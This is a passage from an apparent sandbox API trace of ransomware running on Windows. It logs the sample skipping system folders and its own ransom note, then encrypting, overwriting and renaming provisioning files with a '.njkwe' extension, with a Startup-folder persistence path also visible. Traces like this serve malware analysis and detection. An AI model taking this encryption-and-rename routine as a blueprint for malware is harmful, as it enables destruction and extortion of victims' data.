hFile=0x444, liDistanceToMove=0xfffffca3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.068] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x35d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x35d, lpOverlapped=0x0) returned 1 [0082.068] GetProcessHeap () returned 0xbe0000 [0082.068] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.068] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.068] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.069] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.069] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.069] CloseHandle (hObject=0x444) returned 1 [0082.069] GetProcessHeap () returned 0xbe0000 [0082.069] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.069] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0082.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\557__connections_cellular_orange (senegal)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\557__Connections_Cellular_Orange (Senegal)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\557__connections_cellular_orange (senegal)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.070] GetProcessHeap () returned 0xbe0000 [0082.070] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.070] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9142a17a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9142a17a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9142a17a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x349, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml", cAlternateFileName="558__C~1.PRO")) returned 1 [0082.070] lstrcmpiW (lpString1="558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.070] lstrcmpiW (lpString1="558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.070] lstrcmpiW (lpString1="558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.070] lstrcmpiW (lpString1="558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.070] lstrcmpiW (lpString1="558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.070] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml") returned 160 [0082.070] StrStrIW (lpFirst="558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.070] lstrcmpW (lpString1="558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.070] lstrcmpW (lpString1="558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.070] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\558__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.070] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\558__connections_cellular_orange (senegal)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.071] GetTickCount () returned 0x1154d32 [0082.071] GetTickCount () returned 0x1154d32 [0082.071] GetTickCount () returned 0x1154d32 [0082.071] GetTickCount () returned 0x1154d32 [0082.071] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.071] GetProcessHeap () returned 0xbe0000 [0082.071] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.071] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x349, lpOverlapped=0x0) returned 1 [0082.072] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.073] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x349, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x349, lpOverlapped=0x0) returned 1 [0082.073] GetProcessHeap () returned 0xbe0000 [0082.073] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.073] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.073] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.073] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.073] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.073] CloseHandle (hObject=0x444) returned 1 [0082.073] GetProcessHeap () returned 0xbe0000 [0082.073] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.073] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0082.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\558__connections_cellular_orange (senegal)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\558__Connections_Cellular_Orange (Senegal)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\558__connections_cellular_orange (senegal)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.074] GetProcessHeap () returned 0xbe0000 [0082.074] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.074] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9142a17a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9142a17a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9142a17a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="559__C~1.PRO")) returned 1 [0082.076] lstrcmpiW (lpString1="559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.076] lstrcmpiW (lpString1="559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.076] lstrcmpiW (lpString1="559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.076] lstrcmpiW (lpString1="559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.076] lstrcmpiW (lpString1="559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.076] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml") returned 160 [0082.076] StrStrIW (lpFirst="559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.076] lstrcmpW (lpString1="559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.076] lstrcmpW (lpString1="559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.076] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\559__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.077] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\559__connections_cellular_orange (tunisia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.077] GetTickCount () returned 0x1154d32 [0082.077] GetTickCount () returned 0x1154d32 [0082.077] GetTickCount () returned 0x1154d32 [0082.077] GetTickCount () returned 0x1154d32 [0082.077] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.077] GetProcessHeap () returned 0xbe0000 [0082.077] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.077] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0082.079] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.079] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0082.079] GetProcessHeap () returned 0xbe0000 [0082.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.079] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.079] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.079] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.079] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.079] CloseHandle (hObject=0x444) returned 1 [0082.079] GetProcessHeap () returned 0xbe0000 [0082.079] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.079] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0082.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\559__connections_cellular_orange (tunisia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\559__Connections_Cellular_Orange (Tunisia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\559__connections_cellular_orange (tunisia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.080] GetProcessHeap () returned 0xbe0000 [0082.080] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.080] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x902ba650, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x902ba650, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x902ba650, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml", cAlternateFileName="55__CO~1.PRO")) returned 1 [0082.080] lstrcmpiW (lpString1="55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.080] lstrcmpiW (lpString1="55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.080] lstrcmpiW (lpString1="55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.081] lstrcmpiW (lpString1="55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.081] lstrcmpiW (lpString1="55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.081] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml") returned 154 [0082.081] StrStrIW (lpFirst="55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.081] lstrcmpW (lpString1="55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.081] lstrcmpW (lpString1="55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.081] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\55__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.081] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\55__connections_cellular_oi (brazil)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.081] GetTickCount () returned 0x1154d42 [0082.081] GetTickCount () returned 0x1154d42 [0082.081] GetTickCount () returned 0x1154d42 [0082.081] GetTickCount () returned 0x1154d42 [0082.081] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.081] GetProcessHeap () returned 0xbe0000 [0082.081] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.081] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0082.083] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.083] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2c0, lpOverlapped=0x0) returned 1 [0082.083] GetProcessHeap () returned 0xbe0000 [0082.083] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.083] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.083] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.083] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.083] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.083] CloseHandle (hObject=0x444) returned 1 [0082.083] GetProcessHeap () returned 0xbe0000 [0082.083] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.083] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 174 [0082.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\55__connections_cellular_oi (brazil)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\55__Connections_Cellular_Oi (Brazil)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\55__connections_cellular_oi (brazil)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.084] GetProcessHeap () returned 0xbe0000 [0082.084] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.084] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9142a17a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9142a17a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9142a17a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="560__C~1.PRO")) returned 1 [0082.084] lstrcmpiW (lpString1="560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.084] lstrcmpiW (lpString1="560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.084] lstrcmpiW (lpString1="560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.084] lstrcmpiW (lpString1="560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.084] lstrcmpiW (lpString1="560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.084] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml") returned 160 [0082.084] StrStrIW (lpFirst="560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.084] lstrcmpW (lpString1="560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.084] lstrcmpW (lpString1="560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.084] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\560__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.085] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\560__connections_cellular_orange 